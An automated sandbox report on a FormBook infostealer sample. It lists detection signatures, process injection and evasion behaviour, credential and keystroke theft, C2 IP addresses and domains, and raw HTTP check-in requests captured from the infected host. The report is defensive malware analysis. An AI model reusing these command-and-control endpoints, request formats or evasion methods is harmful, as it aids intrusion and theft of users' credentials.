Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CJE003889.exe

Overview

General Information

Sample name:CJE003889.exe
Analysis ID:1572869
MD5:701f58c31461426d9dd6fafcd8adcd33
SHA1:ccdb3a9aec59affb20fb94e62bca9a52c5900618
SHA256:d33029ee722e3376c49c3a557014f649afe3210c2b400336d9bf39062792dfd0
Tags:exeFormbookuser-koluke
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CJE003889.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\CJE003889.exe" MD5: 701F58C31461426D9DD6FAFCD8ADCD33)
    • svchost.exe (PID: 4180 cmdline: "C:\Users\user\Desktop\CJE003889.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • mcPAaApkdo.exe (PID: 3568 cmdline: "C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 2536 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • mcPAaApkdo.exe (PID: 5904 cmdline: "C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CJE003889.exe", CommandLine: "C:\Users\user\Desktop\CJE003889.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ParentImage: C:\Users\user\Desktop\CJE003889.exe, ParentProcessId: 6840, ParentProcessName: CJE003889.exe, ProcessCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ProcessId: 4180, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CJE003889.exe", CommandLine: "C:\Users\user\Desktop\CJE003889.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ParentImage: C:\Users\user\Desktop\CJE003889.exe, ParentProcessId: 6840, ParentProcessName: CJE003889.exe, ProcessCommandLine: "C:\Users\user\Desktop\CJE003889.exe", ProcessId: 4180, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-11T04:50:45.119882+010020507451Malware Command and Control Activity Detected192.168.2.449743156.226.63.1380TCP
                2024-12-11T04:51:06.514751+010020507451Malware Command and Control Activity Detected192.168.2.449803103.120.80.11180TCP
                2024-12-11T04:51:21.719194+010020507451Malware Command and Control Activity Detected192.168.2.44984238.180.232.10980TCP
                2024-12-11T04:51:36.729307+010020507451Malware Command and Control Activity Detected192.168.2.449876172.67.158.8180TCP
                2024-12-11T04:51:51.917630+010020507451Malware Command and Control Activity Detected192.168.2.449915208.91.197.2780TCP
                2024-12-11T04:52:06.804180+010020507451Malware Command and Control Activity Detected192.168.2.449954172.67.182.19880TCP
                2024-12-11T04:52:21.917490+010020507451Malware Command and Control Activity Detected192.168.2.449993209.74.79.4080TCP
                2024-12-11T04:52:37.334499+010020507451Malware Command and Control Activity Detected192.168.2.45003113.228.81.3980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-11T04:50:45.119882+010028554651A Network Trojan was detected192.168.2.449743156.226.63.1380TCP
                2024-12-11T04:51:06.514751+010028554651A Network Trojan was detected192.168.2.449803103.120.80.11180TCP
                2024-12-11T04:51:21.719194+010028554651A Network Trojan was detected192.168.2.44984238.180.232.10980TCP
                2024-12-11T04:51:36.729307+010028554651A Network Trojan was detected192.168.2.449876172.67.158.8180TCP
                2024-12-11T04:51:51.917630+010028554651A Network Trojan was detected192.168.2.449915208.91.197.2780TCP
                2024-12-11T04:52:06.804180+010028554651A Network Trojan was detected192.168.2.449954172.67.182.19880TCP
                2024-12-11T04:52:21.917490+010028554651A Network Trojan was detected192.168.2.449993209.74.79.4080TCP
                2024-12-11T04:52:37.334499+010028554651A Network Trojan was detected192.168.2.45003113.228.81.3980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-11T04:50:58.497436+010028554641A Network Trojan was detected192.168.2.449779103.120.80.11180TCP
                2024-12-11T04:51:01.162817+010028554641A Network Trojan was detected192.168.2.449785103.120.80.11180TCP
                2024-12-11T04:51:03.835191+010028554641A Network Trojan was detected192.168.2.449792103.120.80.11180TCP
                2024-12-11T04:51:13.697181+010028554641A Network Trojan was detected192.168.2.44981938.180.232.10980TCP
                2024-12-11T04:51:16.397420+010028554641A Network Trojan was detected192.168.2.44982538.180.232.10980TCP
                2024-12-11T04:51:19.144276+010028554641A Network Trojan was detected192.168.2.44983138.180.232.10980TCP
                2024-12-11T04:51:28.700584+010028554641A Network Trojan was detected192.168.2.449858172.67.158.8180TCP
                2024-12-11T04:51:31.372469+010028554641A Network Trojan was detected192.168.2.449864172.67.158.8180TCP
                2024-12-11T04:51:34.028762+010028554641A Network Trojan was detected192.168.2.449870172.67.158.8180TCP
                2024-12-11T04:51:43.656842+010028554641A Network Trojan was detected192.168.2.449897208.91.197.2780TCP
                2024-12-11T04:51:46.298121+010028554641A Network Trojan was detected192.168.2.449903208.91.197.2780TCP
                2024-12-11T04:51:48.968786+010028554641A Network Trojan was detected192.168.2.449909208.91.197.2780TCP
                2024-12-11T04:51:58.789056+010028554641A Network Trojan was detected192.168.2.449936172.67.182.19880TCP
                2024-12-11T04:52:01.448282+010028554641A Network Trojan was detected192.168.2.449942172.67.182.19880TCP
                2024-12-11T04:52:04.122102+010028554641A Network Trojan was detected192.168.2.449948172.67.182.19880TCP
                2024-12-11T04:52:13.920650+010028554641A Network Trojan was detected192.168.2.449975209.74.79.4080TCP
                2024-12-11T04:52:16.585115+010028554641A Network Trojan was detected192.168.2.449981209.74.79.4080TCP
                2024-12-11T04:52:19.304264+010028554641A Network Trojan was detected192.168.2.449987209.74.79.4080TCP
                2024-12-11T04:52:29.278827+010028554641A Network Trojan was detected192.168.2.45001413.228.81.3980TCP
                2024-12-11T04:52:31.935159+010028554641A Network Trojan was detected192.168.2.45002013.228.81.3980TCP
                2024-12-11T04:52:34.606926+010028554641A Network Trojan was detected192.168.2.45002613.228.81.3980TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: CJE003889.exeReversingLabs: Detection: 26%
                Source: CJE003889.exeVirustotal: Detection: 26%Perma Link
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: CJE003889.exeJoe Sandbox ML: detected
                Source: CJE003889.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: route.pdb source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mcPAaApkdo.exe, 00000005.00000000.2065667127.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215787915.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CC445A
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCC6D1 FindFirstFileW,FindClose,0_2_00CCC6D1
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CCC75C
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CCEF95
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CCF0F2
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CCF3F3
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CC37EF
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CC3B12
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CCBCBC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0290CB20 FindFirstFileW,FindNextFileW,FindClose,6_2_0290CB20
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then xor eax, eax6_2_028F9E80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h6_2_02EF04DF

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49792 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49842 -> 38.180.232.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49842 -> 38.180.232.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49803 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49803 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 38.180.232.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49831 -> 38.180.232.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49819 -> 38.180.232.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49743 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49864 -> 172.67.158.81:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49876 -> 172.67.158.81:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49876 -> 172.67.158.81:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49858 -> 172.67.158.81:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 172.67.158.81:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49897 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49915 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49915 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49936 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49942 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49948 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49975 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49987 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49954 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49954 -> 172.67.182.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49993 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49993 -> 209.74.79.40:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 13.228.81.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 13.228.81.39:80
                Source: DNS query: www.313333.xyz
                Source: DNS query: www.313333.xyz
                Source: Joe Sandbox ViewIP Address: 103.120.80.111 103.120.80.111
                Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CD22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CD22EE
                Source: global trafficHTTP traffic detected: GET /0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wuyyv4tq.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                Source: global trafficHTTP traffic detected: GET /5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.313333.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                Source: global trafficHTTP traffic detected: GET /wdm1/?Cpbp2=zjh46zEHi&gnlxDxt=+lDhQwjcqciYGoyMlAmqcMzIngJLQFU8yJeyXm7/HR5vK2UrnZr15LQFOKrK4FY+rjusngfyUMfjWLDl7Hie+r5rQKPTgM+Sd/Dx7kDur+5/ev3d9JlPdbQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mosquitoxp.lolConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                Source: global trafficHTTP traffic detected: GET /0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mzkd6gp5.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                Source: global trafficHTTP traffic detected: GET /sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.epayassist.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
